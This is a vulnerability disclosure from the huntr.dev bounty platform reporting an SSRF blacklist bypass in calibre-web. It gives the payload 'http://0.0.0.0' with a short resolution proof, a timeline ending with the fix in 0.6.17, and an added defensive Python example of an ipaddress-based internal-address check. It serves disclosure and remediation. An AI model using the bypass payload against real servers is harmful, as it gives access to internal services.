Server-Side Request Forgery (SSRF) in janeczku/calibre-web

Valid

Reported on Feb 21st 2022


Description

Bypass of the fix for this earlier report: https://huntr.dev/bounties/499688c4-6ac4-4047-a868-7922c3eab369/

Proof of Concept

The blacklist does not check for 0.0.0.0.

PAYLOAD: http://0.0.0.0

This payload resolves to localhost:

>>> import socket
>>> from urllib.parse import urlparse
>>> PAYLOAD = 'http://0.0.0.0'
>>> socket.getaddrinfo(urlparse(PAYLOAD).hostname, 0)[0][4][0]
'0.0.0.0'

Impact

SSRF

We are processing your report and will contact the janeczku/calibre-web team within 24 hours. 2 years ago
We have contacted a member of the janeczku/calibre-web team and are waiting to hear back 2 years ago
We have sent a follow up to the janeczku/calibre-web team. We will try again in 4 days. 2 years ago
janeczku validated this vulnerability 2 years ago
r0hansh has been awarded the disclosure bounty
The fix bounty is now up for grabs
Rohan Sharma (Researcher), 2 years ago

Suggested fix: use ipaddress to implement localhost/internal network IP address checks.
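The proof of concept above shows a string-matching blacklist missing 0.0.0.0, and the researcher's comment points at the ipaddress module as the fix. The following is an added example, not code from the original report or from calibre-web: a hypothetical naive blacklist (NAIVE_BLACKLIST and naive_is_blocked are illustrative stand-ins, not calibre-web's real check) sits beside a resolve-then-classify check built on ipaddress. The function names and the injectable resolver parameter are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical string-matching blacklist of the kind the report describes.
# Illustrative stand-in only; it is not calibre-web's actual check.
NAIVE_BLACKLIST = {"localhost", "127.0.0.1", "::1"}


def naive_is_blocked(url: str) -> bool:
    """Compare the hostname text against a fixed list.

    Misses 0.0.0.0 (and any other spelling the list does not contain).
    """
    host = (urlparse(url).hostname or "").lower()
    return host in NAIVE_BLACKLIST


def is_internal_address(addr: str) -> bool:
    """True if addr is unspecified (0.0.0.0 / ::), loopback, private,
    link-local, multicast or otherwise reserved.

    Raises ValueError if addr is not a valid IP address literal.
    """
    # Drop an IPv6 zone index such as '%eth0' before parsing.
    ip = ipaddress.ip_address(addr.split("%", 1)[0])
    return (ip.is_unspecified or ip.is_loopback or ip.is_private
            or ip.is_link_local or ip.is_multicast or ip.is_reserved)


def resolve_all(host: str) -> set:
    """Every address (A and AAAA) the system resolver returns for host."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def hardened_is_blocked(url: str, resolver=resolve_all) -> bool:
    """Resolve the hostname and reject the URL if ANY resulting address
    is internal. 'resolver' is injectable (assumed parameter) so the
    classification can be exercised offline with constructed answers.
    """
    parsed = urlparse(url)
    host = parsed.hostname
    if parsed.scheme not in ("http", "https") or not host:
        return True
    try:
        addrs = resolver(host)
        # Fail closed on an empty answer; block if any address is internal.
        return not addrs or any(is_internal_address(a) for a in addrs)
    except (OSError, ValueError):
        # socket.gaierror (unresolvable) is an OSError; ValueError covers
        # a resolver answer that is not a valid address literal.
        return True


if __name__ == "__main__":
    for url in ("http://0.0.0.0", "http://127.0.0.1", "http://[::]/"):
        print(f"{url:16} naive={naive_is_blocked(url)!s:5} "
              f"hardened={hardened_is_blocked(url)}")
```

Two caveats apply when wiring a check like this into a fetcher: the address that passed the check must be the address the HTTP client actually connects to (a separate resolution at fetch time reopens the window to a changed DNS answer), and every redirect target needs the same check before it is followed. Classifying the resolved address rather than the hostname text is what closes the gap the report describes: it rejects 0.0.0.0 and any other spelling the resolver maps to an internal address.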

We have sent a fix follow up to the janeczku/calibre-web team. We will try again in 7 days. 2 years ago
janeczku marked this as fixed in 0.6.17 with commit 965352 2 years ago
The fix bounty has been dropped
helper.py#L736-L737 has been validated